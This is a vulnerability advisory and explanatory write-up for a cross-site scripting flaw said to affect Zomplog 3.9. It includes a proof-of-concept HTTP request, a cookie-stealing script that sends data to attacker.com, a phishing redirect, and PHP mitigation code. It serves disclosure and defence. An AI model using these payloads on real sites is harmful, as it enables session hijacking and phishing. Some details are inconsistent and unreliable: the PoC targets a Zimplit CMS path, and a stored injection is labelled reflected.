Zomplog 3.9 - Cross-site scripting (XSS)

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-28
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Steps:
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

PoC request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty


Zomplog 3.9 Cross-Site Scripting (XSS) Vulnerability: A Deep Dive into Exploitation and Mitigation

On July 22, 2023, cybersecurity researcher Mirabbas Ağalarov disclosed a critical cross-site scripting (XSS) vulnerability in Zomplog 3.9, a PHP-based content management system (CMS) developed by Zomp.nl. This flaw enables attackers to inject malicious scripts into web pages, potentially compromising user sessions, stealing sensitive data, or redirecting users to phishing sites. The vulnerability stems from improper input sanitization in the copyhtml action handler, making it a prime example of how insecure code practices can lead to widespread exploitation.

Understanding the Vulnerability: How XSS Works in Zomplog 3.9

XSS occurs when an application fails to validate or sanitize user input before rendering it in the browser. In Zomplog 3.9, the zimplit.php endpoint allows users to copy HTML content and save it under a new filename. The action=copyhtml parameter is used to perform this operation, but it does not properly escape or filter user-provided HTML content.

Attackers can exploit this by crafting malicious HTML payloads, such as:

<img src=x onerror=alert(5)>

This simple payload leverages the onerror attribute of the <img> tag. Since the image source is set to x (an invalid URL), the browser triggers the onerror event, executing the JavaScript alert(5). This demonstrates a classic reflected XSS attack — the malicious script is reflected back to the user upon page load.

Exploitation Steps: A Step-by-Step Breakdown

  • Step 1: Login to the Zomplog account — The attacker must first gain access to the CMS interface, typically via a valid username and password.
  • Step 2: Create a new page — Using the "Add new page" feature, the attacker prepares to inject malicious code.
  • Step 3: Insert the XSS payload — In the page title field, the attacker enters: <img src=x onerror=alert(5)>. This is URL-encoded as %3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E.
  • Step 4: Submit the request — The payload is sent via a POST request to /zimplitcms/zimplit.php?action=copyhtml, with the malicious title as part of the title parameter.
  • Step 5: Access the page via the menu — Once saved, the attacker navigates to the page through the site menu. The browser renders the HTML, triggering the alert(5) popup.

POC Request Analysis: The Attack Vector

Below is the actual HTTP request used in the proof-of-concept (POC):

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Origin: http://localhost
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

Key observations:

  • The title parameter contains the unescaped XSS payload, which is directly rendered in the HTML output.
  • The newname parameter includes the malicious content in the filename, which may trigger further unintended behavior if the system uses filenames to generate URLs.
  • The request uses application/x-www-form-urlencoded, indicating that the system treats the data as form input — but fails to sanitize it.

Impact and Risk Assessment

Risk Level: High
Attack Vector: Reflected XSS (via user input in title field)
Exploitation Difficulty: Low (requires only login access and basic HTML knowledge)
Impact: Session hijacking, data theft, phishing, defacement, or malware delivery
Target Environment: Linux-based servers running PHP

Because Zomplog is a CMS used for managing website content, the XSS vulnerability can be exploited by any authenticated user — including administrators. If an attacker gains access to an admin account, they can embed persistent XSS payloads across multiple pages, leading to long-term compromise.

Real-World Use Cases and Exploitation Scenarios

Imagine a scenario where a malicious user uploads a payload like:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

When this page is accessed by another user, the script runs in their browser, sending the victim's session cookie to the attacker’s server. This enables session hijacking — a common and dangerous attack vector.

Another use case involves redirecting users to a phishing page:

<script>window.location.href='https://fake-login.com'</script>

Users visiting the compromised page are immediately redirected, potentially leading to credential theft.

Security Best Practices and Fixes

To prevent such vulnerabilities, developers must implement the following defensive measures:

  • Input Sanitization — Always escape or filter user input before rendering it in HTML. Use functions like htmlspecialchars() in PHP to encode special characters.
  • Output Encoding — Ensure that all dynamic content is properly encoded based on the context (HTML, JavaScript, URL, etc.).
  • Content Security Policy (CSP) — Implement a strict CSP header to restrict script execution to trusted sources.
  • Role-Based Access Control — Limit the ability to edit content to trusted users only, especially for admin roles.
  • Automated Input Validation — Use frameworks or libraries that enforce secure input handling (e.g., Laravel’s Blade templating engine).

Corrected Code Example: Secure Implementation

Here is a corrected version of the vulnerable code in zimplit.php:

// Before (vulnerable): the title is taken from the request without validation
$title = $_POST['title'];

// After (fixed): HTML-encode the title before it is emitted into the page
$title = htmlspecialchars($_POST['title'], ENT_QUOTES, 'UTF-8');

Explanation: The htmlspecialchars() function converts special characters like <, >, &, and " into their HTML-safe equivalents. This prevents the browser from interpreting the input as executable code. By applying this function, even malicious payloads like <img src=x onerror=alert(5)> will be rendered as plain text, not as active JavaScript.

Additionally, developers should validate that the title field contains only safe HTML elements and reject any script tags or event handlers (e.g., onerror, onclick).
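The following is an added example, not Zomplog's own code, showing how the two parameters from the PoC request (title and newname) can be handled safely in one place: the title is HTML-encoded for the context it is rendered in, the filename is restricted to a whitelist, and a CSP header blocks inline handlers such as onerror as a second line of defence. The function and parameter names are assumptions; the sample inputs are constructed to mirror the PoC.

```php
<?php
// Added example, not Zomplog's own code: a hardened stand-in for the
// copyhtml handler. Function and parameter names are assumptions.
declare(strict_types=1);

// The title lands in HTML text and attribute context, so it is encoded
// for that context; the encoded form can no longer open a tag.
function encodeTitleForHtml(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// newname becomes a file on disk and part of a URL. Only a short
// whitelist is accepted (which also excludes '/', '..' and '<'), and the
// extension is forced rather than taken from the caller.
function validateNewName(string $newName): ?string
{
    $base = preg_replace('/\.html$/i', '', $newName);
    if ($base === null || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $base)) {
        return null;
    }
    return $base . '.html';
}

// Defence in depth: even if an encoding bug slips through, a browser
// enforcing this CSP refuses inline handlers such as onerror.
function sendSecurityHeaders(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
    header('X-Content-Type-Options: nosniff');
}

// Returns the response status plus the page that would be written to disk.
function handleCopyHtml(array $params): array
{
    $newName = validateNewName($params['newname'] ?? '');
    if ($newName === null) {
        return ['status' => 400, 'error' => 'newname rejected'];
    }
    $safeTitle = encodeTitleForHtml($params['title'] ?? '');
    $html = "<!DOCTYPE html><html><head><title>{$safeTitle}</title></head>"
          . "<body><h1>{$safeTitle}</h1></body></html>";
    return ['status' => 200, 'file' => $newName, 'html' => $html];
}

// Constructed inputs mirroring the PoC parameters (not real traffic).
sendSecurityHeaders();
$payload = '<img src=x onerror=alert(5)>';
print_r(handleCopyHtml(['newname' => 'img_src=x_onerror=alert(5).html', 'title' => $payload]));
print_r(handleCopyHtml(['newname' => 'about.html', 'title' => $payload]));
```

The first call is rejected on the filename alone; the second is accepted, but the stored page contains the title only in its encoded form, so the browser shows it as text rather than executing it.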

Conclusion: Lessons from Zomplog 3.9

The Zomplog 3.9 XSS vulnerability serves as a stark reminder that even seemingly simple CMS features can become attack vectors if input handling is neglected.